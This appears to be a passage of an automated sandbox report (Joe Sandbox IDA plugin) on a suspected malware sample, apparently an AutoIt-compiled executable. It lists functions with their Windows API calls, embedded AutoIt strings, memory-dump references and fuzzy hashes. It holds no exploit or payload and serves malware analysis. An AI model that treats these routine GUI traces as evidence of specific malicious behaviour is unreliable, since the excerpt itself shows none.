                                                                                • GetSysColor.USER32(0000000F), ref: 0041D318
                                                                                • SetBkColor.GDI32(?,000000FF), ref: 0041D332
                                                                                • SelectObject.GDI32(?,00000000), ref: 0041D341
                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 0041D36C
                                                                                • GetSysColor.USER32(00000010), ref: 0041D374
                                                                                • CreateSolidBrush.GDI32(00000000), ref: 0041D37B
                                                                                • FrameRect.USER32(?,?,00000000), ref: 0041D38A
                                                                                • DeleteObject.GDI32(00000000), ref: 0041D391
                                                                                • InflateRect.USER32(?,000000FE,000000FE), ref: 0041D3DC
                                                                                • FillRect.USER32(?,?,00000000), ref: 0041D40E
                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 0041D439
                                                                                  • Part of subcall function 0041D575: GetSysColor.USER32(00000012), ref: 0041D5AE
                                                                                  • Part of subcall function 0041D575: SetTextColor.GDI32(?,?), ref: 0041D5B2
                                                                                  • Part of subcall function 0041D575: GetSysColorBrush.USER32(0000000F), ref: 0041D5C8
                                                                                  • Part of subcall function 0041D575: GetSysColor.USER32(0000000F), ref: 0041D5D3
                                                                                  • Part of subcall function 0041D575: GetSysColor.USER32(00000011), ref: 0041D5F0
                                                                                  • Part of subcall function 0041D575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0041D5FE
                                                                                  • Part of subcall function 0041D575: SelectObject.GDI32(?,00000000), ref: 0041D60F
                                                                                  • Part of subcall function 0041D575: SetBkColor.GDI32(?,00000000), ref: 0041D618
                                                                                  • Part of subcall function 0041D575: SelectObject.GDI32(?,?), ref: 0041D625
                                                                                  • Part of subcall function 0041D575: InflateRect.USER32(?,000000FF,000000FF), ref: 0041D644
                                                                                  • Part of subcall function 0041D575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0041D65B
                                                                                  • Part of subcall function 0041D575: GetWindowLongW.USER32(00000000,000000F0), ref: 0041D670
                                                                                  • Part of subcall function 0041D575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0041D698
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                • String ID:
                                                                                • API String ID: 3521893082-0
                                                                                • Opcode ID: dff338d8d21f1515c06a8a8c7e019d4ff29e0d2c87d98eb92afc78b3f90d5521
                                                                                • Instruction ID: e93fabe6d66ce82e534a24891db79ca01185e06e12bea7b5fcd66a20c03e9e4e
                                                                                • Opcode Fuzzy Hash: dff338d8d21f1515c06a8a8c7e019d4ff29e0d2c87d98eb92afc78b3f90d5521
                                                                                • Instruction Fuzzy Hash: 7591B671808305BFCB109F64EC48EAB7BB9FF89325F101A29F962961E0C735D945CB56
                                                                                Function 003CB8FD Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 491windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • DestroyWindow.USER32 ref: 003CB98B
                                                                                • DeleteObject.GDI32(00000000), ref: 003CB9CD
                                                                                • DeleteObject.GDI32(00000000), ref: 003CB9D8
                                                                                • DestroyIcon.USER32(00000000), ref: 003CB9E3
                                                                                • DestroyWindow.USER32(00000000), ref: 003CB9EE
                                                                                • SendMessageW.USER32(?,00001308,?,00000000), ref: 0042D2AA
                                                                                • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0042D2E3
                                                                                • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 0042D711
                                                                                  • Part of subcall function 003CB9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,003CB759,?,00000000,?,?,?,?,003CB72B,00000000,?), ref: 003CBA58
                                                                                • SendMessageW.USER32 ref: 0042D758
                                                                                • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0042D76F
                                                                                • ImageList_Destroy.COMCTL32(00000000), ref: 0042D785
                                                                                • ImageList_Destroy.COMCTL32(00000000), ref: 0042D790
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                                • String ID: 0
                                                                                • API String ID: 464785882-4108050209
                                                                                • Opcode ID: 4307bbea1c82c9270b3500c4aa714e7bec0eaf91bfb239c67a4fd92a250f477f
                                                                                • Instruction ID: eb8becf0d96be40dbbb2d3692cf4a1b51d1d045068e7961fcc72612536595d05
                                                                                • Opcode Fuzzy Hash: 4307bbea1c82c9270b3500c4aa714e7bec0eaf91bfb239c67a4fd92a250f477f
                                                                                • Instruction Fuzzy Hash: B712AC30A00221EFDB25CF24E885BAAB7E5FF49304F54456EE989CB662C735EC41CB95
                                                                                Function 003FDBC4 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 187COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetErrorMode.KERNEL32(00000001), ref: 003FDBD6
                                                                                • GetDriveTypeW.KERNEL32(?,0044DC54,?,\\.\,0044DC00), ref: 003FDCC3
                                                                                • SetErrorMode.KERNEL32(00000000,0044DC54,?,\\.\,0044DC00), ref: 003FDE29
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorMode$DriveType
                                                                                • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                • API String ID: 2907320926-4222207086
                                                                                • Opcode ID: 2ef7f44583cb3a5f1e0cc14c43d4b293190167fdfcdb75bc68580c344a4950ae
                                                                                • Instruction ID: 806bd1cb12fc41486fc21e37dd5b0fcbb1a1351b87a549ddac2a35d23fb649fc
                                                                                • Opcode Fuzzy Hash: 2ef7f44583cb3a5f1e0cc14c43d4b293190167fdfcdb75bc68580c344a4950ae
                                                                                • Instruction Fuzzy Hash: 375107302083499BC216DF10C899A79B7A6FF54705B20481BF2039F692EB74E945D747
                                                                                Function 003BCC24 Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 267COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: __wcsnicmp
                                                                                • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                • API String ID: 1038674560-86951937
                                                                                • Opcode ID: 06caeee6d04a1a268a3c465540eacd537f51ba20d63ba4208e2668d0332d9dfd
                                                                                • Instruction ID: 4154cc6ea4b91f9fa9b15a573ba8fd7a35cb0beb2fbf565a75eb53bc1dd0c23c
                                                                                • Opcode Fuzzy Hash: 06caeee6d04a1a268a3c465540eacd537f51ba20d63ba4208e2668d0332d9dfd
                                                                                • Instruction Fuzzy Hash: 17812C717402157BDB32AE64DD42FFF7768AF24304F14102AFA05AF686EBA4D901D295
                                                                                Function 0041C6E9 Relevance: 42.4, APIs: 23, Strings: 1, Instructions: 447windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 0041C788
                                                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0041C83E
                                                                                • SendMessageW.USER32(?,00001102,00000002,?), ref: 0041C859
                                                                                • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0041CB15
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$Window
                                                                                • String ID: 0
                                                                                • API String ID: 2326795674-4108050209
                                                                                • Opcode ID: d999797282cb219312bef060d13b92ce822b1e7e9f1adaea0472f7c00563b0ce
                                                                                • Instruction ID: 4fae76bc83b2939db6be60ee59e624640274b6d21a7f0ba89869f67836288dce
                                                                                • Opcode Fuzzy Hash: d999797282cb219312bef060d13b92ce822b1e7e9f1adaea0472f7c00563b0ce
                                                                                • Instruction Fuzzy Hash: E5F1C170688301ABD7218F24DCC6BEBBBE4FF45754F04052AF598D62A1D778D881CB9A
                                                                                Function 0041638D Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 352COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CharUpperBuffW.USER32(?,?,0044DC00), ref: 00416449
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: BuffCharUpper
                                                                                • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                • API String ID: 3964851224-45149045
                                                                                • Opcode ID: 5f9739a53a477d4d55f1b4e4dd313c0ac2c06674d5da7656b117f13e25802330
                                                                                • Instruction ID: 71c43402a9f57e89077a55eec6ea196fa8fddc23dfecf339fa7d1f369ea659ab
                                                                                • Opcode Fuzzy Hash: 5f9739a53a477d4d55f1b4e4dd313c0ac2c06674d5da7656b117f13e25802330
                                                                                • Instruction Fuzzy Hash: 94C1B5342042558BCB05EF10C551EAFB795AF95344F01885EF8559F3E2DB28ED8BCB4A
                                                                                Function 0041D575 Relevance: 39.2, APIs: 26, Instructions: 186windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetSysColor.USER32(00000012), ref: 0041D5AE
                                                                                • SetTextColor.GDI32(?,?), ref: 0041D5B2
                                                                                • GetSysColorBrush.USER32(0000000F), ref: 0041D5C8
                                                                                • GetSysColor.USER32(0000000F), ref: 0041D5D3
                                                                                • CreateSolidBrush.GDI32(?), ref: 0041D5D8
                                                                                • GetSysColor.USER32(00000011), ref: 0041D5F0
                                                                                • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0041D5FE
                                                                                • SelectObject.GDI32(?,00000000), ref: 0041D60F
                                                                                • SetBkColor.GDI32(?,00000000), ref: 0041D618
                                                                                • SelectObject.GDI32(?,?), ref: 0041D625
                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 0041D644
                                                                                • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0041D65B
                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 0041D670
                                                                                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0041D698
                                                                                • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041D6BF
                                                                                • InflateRect.USER32(?,000000FD,000000FD), ref: 0041D6DD
                                                                                • DrawFocusRect.USER32(?,?), ref: 0041D6E8
                                                                                • GetSysColor.USER32(00000011), ref: 0041D6F6
                                                                                • SetTextColor.GDI32(?,00000000), ref: 0041D6FE
                                                                                • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0041D712
                                                                                • SelectObject.GDI32(?,0041D2A5), ref: 0041D729
                                                                                • DeleteObject.GDI32(?), ref: 0041D734
                                                                                • SelectObject.GDI32(?,?), ref: 0041D73A
                                                                                • DeleteObject.GDI32(?), ref: 0041D73F
                                                                                • SetTextColor.GDI32(?,?), ref: 0041D745
                                                                                • SetBkColor.GDI32(?,?), ref: 0041D74F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                • String ID:
                                                                                • API String ID: 1996641542-0
                                                                                • Opcode ID: d1eb5c74a98b09c75aeda53b419672cff8d71902c94a084ec34158bc7cfff052
                                                                                • Instruction ID: be5e4dafaaf19d4dce4ead3575c99c815d5f252c6d55ed8fc7eb0b452d244550
                                                                                • Opcode Fuzzy Hash: d1eb5c74a98b09c75aeda53b419672cff8d71902c94a084ec34158bc7cfff052
                                                                                • Instruction Fuzzy Hash: A4513B71D00218BFDF109FA4EC48EEE7B7AEB08324F205525F915AB2A1D7759A40DB54
                                                                                Function 0041B6C4 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 400windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0041B7B0
                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0041B7C1
                                                                                • CharNextW.USER32(0000014E), ref: 0041B7F0
                                                                                • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0041B831
                                                                                • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 0041B847
                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0041B858
                                                                                • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 0041B875
                                                                                • SetWindowTextW.USER32(?,0000014E), ref: 0041B8C7
                                                                                • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 0041B8DD
                                                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 0041B90E
                                                                                • _memset.LIBCMT ref: 0041B933
                                                                                • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 0041B97C
                                                                                • _memset.LIBCMT ref: 0041B9DB
                                                                                • SendMessageW.USER32 ref: 0041BA05
                                                                                • SendMessageW.USER32(?,00001074,?,00000001), ref: 0041BA5D
                                                                                • SendMessageW.USER32(?,0000133D,?,?), ref: 0041BB0A
                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 0041BB2C
                                                                                • GetMenuItemInfoW.USER32(?), ref: 0041BB76
                                                                                • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0041BBA3
                                                                                • DrawMenuBar.USER32(?), ref: 0041BBB2
                                                                                • SetWindowTextW.USER32(?,0000014E), ref: 0041BBDA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                • String ID: 0
                                                                                • API String ID: 1073566785-4108050209
                                                                                • Opcode ID: 44b38c68797b39df52b28475de959af4bf3fb2b5744858224ecb6140b67cb034
                                                                                • Instruction ID: bc615952a08911dd10fdc96788323da12bfe750327d8fd426dab88ec870fc065
                                                                                • Opcode Fuzzy Hash: 44b38c68797b39df52b28475de959af4bf3fb2b5744858224ecb6140b67cb034
                                                                                • Instruction Fuzzy Hash: DFE1D071900208ABDF119F65DC84EEF7B78FF04714F10815BF929AA290D7789A82CFA5
                                                                                Function 003B2EC0 Relevance: 37.1, APIs: 8, Strings: 13, Instructions: 346COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Foreground
                                                                                • String ID: ACTIVE$ALL$CLASS$H+F$HANDLE$INSTANCE$L+F$LAST$P+F$REGEXPCLASS$REGEXPTITLE$T+F$TITLE
                                                                                • API String ID: 62970417-2709185334
                                                                                • Opcode ID: 49e482766ec54c44d04fdeffa56860d3f29a1e13fa9ec0adae0d8666d3468099
                                                                                • Instruction ID: 32f0e2a164ae5808a8a1e32085909f1a0b2ff264b05597946bfdc2c8f14921b1
                                                                                • Opcode Fuzzy Hash: 49e482766ec54c44d04fdeffa56860d3f29a1e13fa9ec0adae0d8666d3468099
                                                                                • Instruction Fuzzy Hash: F4D11A30204642FBC705DF20D641AABBBB0FF54304F408A1EF5559B6A1DBB8F95ACB96
                                                                                Function 0041764F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetCursorPos.USER32(?), ref: 0041778A
                                                                                • GetDesktopWindow.USER32 ref: 0041779F
                                                                                • GetWindowRect.USER32(00000000), ref: 004177A6
                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00417808
                                                                                • DestroyWindow.USER32(?), ref: 00417834
                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 0041785D
                                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0041787B
                                                                                • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 004178A1
                                                                                • SendMessageW.USER32(?,00000421,?,?), ref: 004178B6
                                                                                • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 004178C9
                                                                                • IsWindowVisible.USER32(?), ref: 004178E9
                                                                                • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00417904
                                                                                • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00417918
                                                                                • GetWindowRect.USER32(?,?), ref: 00417930
                                                                                • MonitorFromPoint.USER32(?,?,00000002), ref: 00417956
                                                                                • GetMonitorInfoW.USER32 ref: 00417970
                                                                                • CopyRect.USER32(?,?), ref: 00417987
                                                                                • SendMessageW.USER32(?,00000412,00000000), ref: 004179F2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                • String ID: ($0$tooltips_class32
                                                                                • API String ID: 698492251-4156429822
                                                                                • Opcode ID: e58aa6b9ba1d811dcb9146000b0296332d4ffda661191374c5a773b5dbe1d390
                                                                                • Instruction ID: 90815065edb2fb40db6971abdf0802a45102ca11b615d8f0c19be9f6ddb397bc
                                                                                • Opcode Fuzzy Hash: e58aa6b9ba1d811dcb9146000b0296332d4ffda661191374c5a773b5dbe1d390
                                                                                • Instruction Fuzzy Hash: CEB19D71608300AFDB04DF64C949BAABBF5FF88314F00891EF5999B291D774E845CB9A
                                                                                Function 003F6CE9 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 178COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetFileVersionInfoSizeW.VERSION(?,?), ref: 003F6CFB
                                                                                • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 003F6D21
                                                                                • _wcscpy.LIBCMT ref: 003F6D4F
                                                                                • _wcscmp.LIBCMT ref: 003F6D5A
                                                                                • _wcscat.LIBCMT ref: 003F6D70
                                                                                • _wcsstr.LIBCMT ref: 003F6D7B
                                                                                • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 003F6D97
                                                                                • _wcscat.LIBCMT ref: 003F6DE0
                                                                                • _wcscat.LIBCMT ref: 003F6DE7
                                                                                • _wcsncpy.LIBCMT ref: 003F6E12
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                • API String ID: 699586101-1459072770
                                                                                • Opcode ID: 1d9149ad50968d460b7b3d96307809f91d0a4b650be134c3800a0f273c3444ec
                                                                                • Instruction ID: ed52a5b464de1e5effb49c556aa8f4037a8d489623042e8b4d3870df32581dd0
                                                                                • Opcode Fuzzy Hash: 1d9149ad50968d460b7b3d96307809f91d0a4b650be134c3800a0f273c3444ec
                                                                                • Instruction Fuzzy Hash: 9B41D772A00214BBE716BB64DD47FBF777CEF51710F14006AFA01EA282EB74DA0196A5
                                                                                Function 003CA856 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 285windowtimeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 003CA939
                                                                                • GetSystemMetrics.USER32(00000007), ref: 003CA941
                                                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 003CA96C
                                                                                • GetSystemMetrics.USER32(00000008), ref: 003CA974
                                                                                • GetSystemMetrics.USER32(00000004), ref: 003CA999
                                                                                • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 003CA9B6
                                                                                • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 003CA9C6
                                                                                • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 003CA9F9
                                                                                • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 003CAA0D
                                                                                • GetClientRect.USER32(00000000,000000FF), ref: 003CAA2B
                                                                                • GetStockObject.GDI32(00000011), ref: 003CAA47
                                                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 003CAA52
                                                                                  • Part of subcall function 003CB63C: GetCursorPos.USER32(000000FF), ref: 003CB64F
